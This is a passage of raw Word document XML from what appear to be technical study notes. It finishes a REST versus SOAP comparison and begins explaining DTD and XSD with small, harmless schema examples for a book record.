          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> because it uses standard HTTP protocols and is based on simple principles (such as CRUD operations).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E03B25" w14:textId="77777777" w:rsidR="00DB72A6" w:rsidRPr="00585961" w:rsidRDefault="00DB72A6" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1778"/>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SOAP requires understanding </w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>XML</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>WSDL</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SOAP headers</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which can be more complex.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A49ACB8" w14:textId="77777777" w:rsidR="00DB72A6" w:rsidRPr="00585961" w:rsidRDefault="00DB72A6"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4. Performance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0773E41E" w14:textId="77777777" w:rsidR="00DB72A6" w:rsidRPr="00585961" w:rsidRDefault="00DB72A6" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1779"/>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REST</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> uses lightweight data formats like </w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JSON</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which is more efficient in terms of performance and bandwidth.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0402FB24" w14:textId="77777777" w:rsidR="00DB72A6" w:rsidRPr="00585961" w:rsidRDefault="00DB72A6" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1779"/>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OAP</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> uses </w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>XML</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which is larger and requires more processing to parse, leading to higher overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016935F3" w14:textId="77777777" w:rsidR="00DB72A6" w:rsidRPr="00585961" w:rsidRDefault="00DB72A6"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5. Flexibility:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4762A6" w14:textId="77777777" w:rsidR="00DB72A6" w:rsidRPr="00585961" w:rsidRDefault="00DB72A6" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1780"/>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REST</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is more flexible in terms of the types of data it can work with (e.g., JSON, XML, plain text).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A05D10" w14:textId="77777777" w:rsidR="00DB72A6" w:rsidRPr="00585961" w:rsidRDefault="00DB72A6" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1780"/>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OAP</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is strict about using </w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>XML</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> as the message format.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E3F421" w14:textId="77777777" w:rsidR="00DB72A6" w:rsidRPr="00585961" w:rsidRDefault="00DB72A6"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Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1959BA" w14:textId="77777777" w:rsidR="00DB72A6" w:rsidRPr="00CE4B95" w:rsidRDefault="00DB72A6" w:rsidP="00585961">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>REST</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is typically easier to work with, more flexible, and simpler to implement, especially for web services and APIs. </w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SOAP</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, on the other hand, is better suited for applications requiring high security, reliability, and complex transactions (such as banking or enterprise systems).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F6C9C3" w14:textId="3B4C3E5B" w:rsidR="001456D8" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="001456D8">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EB54606">
          <v:rect id="_x0000_i1963" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="355DA496" w14:textId="41538E75" w:rsidR="009E74CB" w:rsidRPr="00CE4B95" w:rsidRDefault="002753BC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="400" w:name="_Toc196307880"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What do you know about DTD and XSD</w:t>
      </w:r>
      <w:r w:rsidR="009E74CB" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="400"/>
    </w:p>
    <w:p w14:paraId="30EBA1CF" w14:textId="688622DA" w:rsidR="00B43DDB" w:rsidRPr="00585961" w:rsidRDefault="00B43DDB" w:rsidP="00585961">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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DTD (Document Type Definition) and XSD (XML Schema Definition) are both used to define the structure and rules of an XML document. However, they differ in their features and functionality. Here's a comparison of both:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AAB4170" w14:textId="77777777" w:rsidR="00B43DDB" w:rsidRPr="00585961" w:rsidRDefault="00000000" w:rsidP="0058596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316B977">
          <v:rect id="_x0000_i1964" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FA4B36" w14:textId="77777777" w:rsidR="00B43DDB" w:rsidRPr="00585961" w:rsidRDefault="00B43DDB"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DTD (Document Type Definition)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B245B89"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Definition</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>DTD is a set of rules that define the structure and valid elements within an XML document. It was one of the first ways to define the structure of XML.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD89FF7"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Types of DTD</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7D90AF" w14:textId="77777777" w:rsidR="00B43DDB" w:rsidRPr="00585961" w:rsidRDefault="00B43DDB" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1781"/>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Internal DTD</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Defined within the XML document itself.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35246E21" w14:textId="77777777" w:rsidR="00B43DDB" w:rsidRPr="00585961" w:rsidRDefault="00B43DDB" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1781"/>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External DTD</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Defined in a separate file and linked to the XML document.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A1B8AF"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yntax</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44370377" w14:textId="77777777" w:rsidR="00B43DDB" w:rsidRPr="00585961" w:rsidRDefault="00B43DDB" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1782"/>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DTD uses a </w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>declarative syntax</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for specifying valid elements, attributes, and their relationships.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8CC9AB"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t;!DOCTYPE book [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D216C00"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ELEMENT book (title, author, year)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363935C2"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ELEMENT title (#PCDATA)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD033C2"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ELEMENT author (#PCDATA)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5E82FB"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    &lt;!ELEMENT year (#PCDATA)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD38111"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gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360B579F"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Features</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2D3EB5" w14:textId="77777777" w:rsidR="00B43DDB" w:rsidRPr="00585961" w:rsidRDefault="00B43DDB" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1783"/>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implicity</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: DTD is simpler and has been around since the early days of XML.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECB9EB1" w14:textId="77777777" w:rsidR="00B43DDB" w:rsidRPr="00585961" w:rsidRDefault="00B43DDB" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1783"/>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Limited Data Types</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: DTD only supports </w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>text-based data</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and lacks strong data typing. It doesn't allow specifying complex data types (e.g., integer, date).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0493A660" w14:textId="77777777" w:rsidR="00B43DDB" w:rsidRPr="00585961" w:rsidRDefault="00B43DDB" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1783"/>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No Namespace Support</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: DTD doesn't support XML namespaces.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F625B96" w14:textId="77777777" w:rsidR="00B43DDB" w:rsidRPr="00585961" w:rsidRDefault="00B43DDB" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1783"/>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Loose Validation</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: DTD doesn't offer detailed validation, making it less robust than XSD.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B60517F"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Usage</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69236454" w14:textId="77777777" w:rsidR="00B43DDB" w:rsidRPr="00585961" w:rsidRDefault="00B43DDB" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1784"/>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DTD is still used in certain legacy systems but is generally replaced by XSD for more complex requirements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DCCD9A3" w14:textId="77777777" w:rsidR="00B43DDB" w:rsidRPr="00585961" w:rsidRDefault="00000000" w:rsidP="0058596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9D5F8C0">
          <v:rect id="_x0000_i1965" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C60401" w14:textId="77777777" w:rsidR="00B43DDB" w:rsidRPr="00585961" w:rsidRDefault="00B43DDB"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XSD (XML Schema Definition)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75946045"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Definition</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">XSD is a more powerful and flexible way to define the structure and data types of an XML document. It is the </w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>recommended</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> schema definition language for XML documents.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583E22F6"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yntax</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D026C9" w14:textId="77777777" w:rsidR="00B43DDB" w:rsidRPr="00585961" w:rsidRDefault="00B43DDB" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1785"/>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XSD is written using XML syntax itself. It allows more control over data types, structures, and relationships.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666CCAAE"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t;xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A850FF"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xs:element name="book"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32383408"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xs:complexType&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3130F83D"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xs:sequence&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB01420"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xs:element name="title" type="xs:string"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0400F2E9"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xs:element name="author" type="xs:string"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33737B9C"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xs:element name="year" type="xs:int"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7059D487"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xs:sequence&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413B3C79"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xs:complexType&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188BCA7F"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xs:element&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E42A20"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t;/xs:schema&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D30EC1C"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Features</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DEC9E3" w14:textId="77777777" w:rsidR="00B43DDB" w:rsidRPr="00585961" w:rsidRDefault="00B43DDB" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="178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Rich Data Types</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: XSD provides </w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>rich data type support</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, including strings, integers, dates, booleans, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F3C987" w14:textId="77777777" w:rsidR="00B43DDB" w:rsidRPr="00585961" w:rsidRDefault="00B43DDB" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="178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Namespaces Support</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
